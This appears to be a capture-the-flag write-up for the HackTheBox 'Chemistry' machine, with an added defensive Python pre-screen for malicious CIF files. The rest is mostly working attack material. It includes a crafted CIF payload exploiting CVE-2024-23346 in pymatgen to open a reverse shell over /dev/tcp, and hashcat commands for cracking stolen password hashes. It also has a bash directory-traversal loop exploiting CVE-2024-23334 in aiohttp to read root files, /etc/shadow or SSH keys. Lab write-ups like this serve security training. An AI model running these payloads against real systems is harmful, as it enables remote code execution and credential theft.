HackTheBox Chemistry Writeup
Explore the fundamentals of cybersecurity in the Chemistry Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.38 chemistry.htb
Script to add hosts automatically
ip="10.10.11.38"
domain="chemistry.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV chemistry.htb
Nmap scan report for chemistry.htb (10.10.11.38)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2024-23346
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
Start a listener:
nc -lvnp 9001
Create the file example.cif:
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.16/9001 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
Upload the file to http://chemistry.htb:5000/.
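As an added defensive illustration (not part of the original writeup and not pymatgen's own code), a small Python pre-screen an upload handler could run before handing a CIF file to the parser. Vulnerable pymatgen versions (CVE-2024-23346) evaluated the value of _space_group_magn.transform_BNS_Pp_abc as Python, so the check refuses any file whose transform field contains more than the axis letters, signs, digits, fractions and separators a transformation string needs; the token whitelist is an assumption about that grammar, not pymatgen's parser.

```python
import re
from typing import Optional

# Added defensive pre-screen, not pymatgen's own code. Vulnerable pymatgen
# versions (CVE-2024-23346) passed the value of this CIF key to eval(), so a
# crafted string in it ran as Python. A legitimate transformation such as
# 'a,b,c;0,0,0' or '-a+b,c,1/2;0,1/2,0' only needs axis letters, signs,
# digits, fractions and separators, so everything else is refused up front.
TRANSFORM_KEY = "_space_group_magn.transform_BNS_Pp_abc"

# Token whitelist (an assumption about the expected grammar, not pymatgen's parser).
_SAFE_TRANSFORM = re.compile(r"^[abcxyz0-9+\-*/.,; ]+$")


def extract_transform(cif_text: str) -> Optional[str]:
    """Return the value of TRANSFORM_KEY with surrounding CIF quotes removed, or None."""
    for line in cif_text.splitlines():
        stripped = line.strip()
        if not stripped.startswith(TRANSFORM_KEY):
            continue
        value = stripped[len(TRANSFORM_KEY):].strip()
        # CIF string values may be wrapped in matching single or double quotes.
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        return value
    return None


def is_safe_cif(cif_text: str) -> bool:
    """True when the file has no transform field or one made only of safe tokens."""
    value = extract_transform(cif_text)
    if value is None:
        return True
    return _SAFE_TRANSFORM.fullmatch(value) is not None


# Constructed samples for demonstration.
BENIGN_CIF = (
    "data_Example\n"
    "_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'\n"
)
# Harmless stand-in for an injected expression: any attribute access or
# brackets in the field are enough to reject the file.
SUSPICIOUS_CIF = (
    "data_Example\n"
    "_space_group_magn.transform_BNS_Pp_abc 'a,b,[x.__class__ for x in ()];0,0,0'\n"
)
```

Running the screen on the two constructed samples accepts BENIGN_CIF and rejects SUSPICIOUS_CIF; a file with no transform field at all passes unchanged.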
Once the listener receives the shell, run this on the pwned machine:
python3 -m http.server
Then, on your local machine:
wget http://chemistry.htb:8000/instance/database.db
sqlite3 database.db
SELECT * FROM user;
Brute Force the Hash
Use a hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 0 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 0 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
Forward port 8080 and log in with SSH:
ssh -L 8081:localhost:8080 rosa@chemistry.htb
cat /home/rosa/user.txt
CVE-2024-23334
dirb http://localhost:8080/
Scan the remote service directly. You may find:
+ http://localhost:8080/assets (CODE:403|SIZE:14)
The server is running Python/3.9 aiohttp/3.9.1, which is vulnerable to CVE-2024-23334, allowing potential exploitation of assets.
On the remote machine, use the following script to exploit directory traversal without needing to set up a tunnel:
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt"
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done
If you want to retrieve sensitive files, simply modify the file variable in the script to target files like root/.ssh/id_rsa or /etc/shadow and rerun the script: